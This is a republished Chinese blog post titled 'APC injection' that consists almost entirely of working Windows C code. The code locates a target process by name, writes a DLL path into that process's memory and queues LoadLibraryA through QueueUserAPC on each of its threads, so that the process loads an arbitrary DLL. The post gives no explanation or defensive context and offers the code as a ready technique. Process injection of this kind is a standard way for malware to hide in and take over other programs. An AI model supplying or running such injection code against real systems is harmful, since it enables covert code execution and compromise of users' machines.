首页 > 其他 > 详细

APC注入

时间:2019-05-27 00:11:42      阅读:152      评论:0      收藏:0      [点我收藏+]
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

DWORD GetProcessIdByName(char *pszProcessName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};
BOOL bRet = Process32First(hSnap, &ProcesEntry);
while (bRet) {
if (strcmpi(ProcesEntry.szExeFile, pszProcessName) == 0) {
return ProcesEntry.th32ProcessID;
}
bRet = Process32Next(hSnap, &ProcesEntry);
}
}

BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){
HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};
BOOL bRet=Thread32First(hSnap, &ThreadEntry);
DWORD *pThreadId =malloc(sizeof(DWORD)*1024);
int count=0;
while(bRet){
if(ThreadEntry.th32OwnerProcessID==ProcessId){
pThreadId[count]=ThreadEntry.th32ThreadID;
count++;
}
bRet=Thread32Next(hSnap, &ThreadEntry);
}
*ppThreadId=pThreadId;
*LengthThread=count;
}

BOOL DllInject(char *pszProcessName,char *pszDllName){
DWORD ProcessId=GetProcessIdByName(pszProcessName);
DWORD *pThreadId=NULL;
DWORD LengthThread=0;
GetAllThreadId(ProcessId, &pThreadId, &LengthThread);
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
LPVOID lDllAdr=VirtualAllocEx(hProcess, NULL, strlen(pszDllName)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lDllAdr, pszDllName, strlen(pszDllName)+1, 0);
FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
HANDLE hThread;
for(int i=0;i<LengthThread;i++){
hThread=OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
QueueUserAPC((PAPCFUNC)pLoadLibraryA, hThread,(ULONG_PTR) lDllAdr);
}
}

int main(){
DllInject("code.exe", "C:\\Users\\beini\\Desktop\\work\\test.dll");
return 0;
}

APC注入

原文:https://www.cnblogs.com/far-ring3/p/10928238.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!